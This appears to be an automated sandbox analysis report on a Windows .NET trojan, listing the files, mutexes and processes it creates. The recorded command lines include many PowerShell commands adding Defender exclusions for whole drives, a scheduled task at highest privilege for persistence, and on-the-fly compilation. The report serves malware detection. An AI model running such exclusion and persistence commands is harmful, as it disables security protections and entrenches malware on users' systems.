                            Source: CpvYgJX57w.71.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: CpvYgJX57w.71.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: CpvYgJX57w.71.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: CpvYgJX57w.71.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: CpvYgJX57w.71.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: CpvYgJX57w.71.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: svchost.exe, 0000004C.00000003.2526789075.0000021257EB3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.76.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                            Source: svchost.exe, 0000004C.00000003.2526789075.0000021257E40000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.76.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                            Source: powershell.exe, 0000003A.00000002.2532930732.000001B900228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: qmgr.db.76.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                            Source: CpvYgJX57w.71.drString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: CpvYgJX57w.71.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Windows\CbsTemp\bd46efcfcb9cccJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMPJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMPJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF848BF0D780_2_00007FF848BF0D78
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF8493468000_2_00007FF849346800
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 72_2_00007FF848BD0D9872_2_00007FF848BD0D98
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BF23FF74_2_00007FF848BF23FF
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848C010A574_2_00007FF848C010A5
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848C0CBC674_2_00007FF848C0CBC6
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BE06C074_2_00007FF848BE06C0
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BD0D9874_2_00007FF848BD0D98
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeCode function: 77_2_00007FF848BE0D7877_2_00007FF848BE0D78
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 78_2_00007FF848C110A578_2_00007FF848C110A5
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 78_2_00007FF848C1CBC678_2_00007FF848C1CBC6
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 78_2_00007FF848BE0D7878_2_00007FF848BE0D78
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 78_2_00007FF848C023FF78_2_00007FF848C023FF
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 78_2_00007FF848BF06C078_2_00007FF848BF06C0
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AKEAUBbV.log C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                            Source: 9XHFe6y4Dj.exe, 00000048.00000002.2493872082.000000000288B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 9XHFe6y4Dj.exe
                            Source: 9XHFe6y4Dj.exe, 0000004A.00000002.2617268996.00000000034DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 9XHFe6y4Dj.exe
                            Source: 9XHFe6y4Dj.exe, 0000004A.00000002.2617268996.0000000003462000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 9XHFe6y4Dj.exe
                            Source: 9XHFe6y4Dj.exe, 0000004E.00000002.2896718557.00000000029EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 9XHFe6y4Dj.exe
                            Source: 9XHFe6y4Dj.exe, 0000004E.00000002.2896718557.0000000002972000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 9XHFe6y4Dj.exe
                            Source: 9XHFe6y4Dj.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 9XHFe6y4Dj.exe
                            Source: 9XHFe6y4Dj.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: 9XHFe6y4Dj.exe, PxYyBN7eGEjABOahheG.csCryptographic APIs: 'CreateDecryptor'
                            Source: 9XHFe6y4Dj.exe, PxYyBN7eGEjABOahheG.csCryptographic APIs: 'CreateDecryptor'
                            Source: 9XHFe6y4Dj.exe, PxYyBN7eGEjABOahheG.csCryptographic APIs: 'CreateDecryptor'
                            Source: 9XHFe6y4Dj.exe, PxYyBN7eGEjABOahheG.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@86/167@1/2
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exeJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\JTIguxNU.logJump to behavior
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeMutant created: NULL
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-dVH10D4cdJAzs948YjfF
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4400:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_03
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\AppData\Local\Temp\tmiybkukJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat"
                            Source: 9XHFe6y4Dj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: 9XHFe6y4Dj.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: DTEg3zrlZw.71.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: 9XHFe6y4Dj.exeReversingLabs: Detection: 65%
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile read: C:\Users\user\Desktop\9XHFe6y4Dj.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES97EB.tmp" "c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP"
                            Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "9XHFe6y4Dj9" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\9XHFe6y4Dj.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9XHFe6y4Dj.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\Desktop\9XHFe6y4Dj.exe C:\Users\user\Desktop\9XHFe6y4Dj.exe
                            Source: unknownProcess created: C:\Users\user\Desktop\9XHFe6y4Dj.exe C:\Users\user\Desktop\9XHFe6y4Dj.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: unknownProcess created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: unknownProcess created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Source: unknownProcess created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                            Source: unknownProcess created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                            Source: unknownProcess created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP"Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "9XHFe6y4Dj9" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\9XHFe6y4Dj.exe'" /rl HIGHEST /fJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9XHFe6y4Dj.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat" Jump to behavior
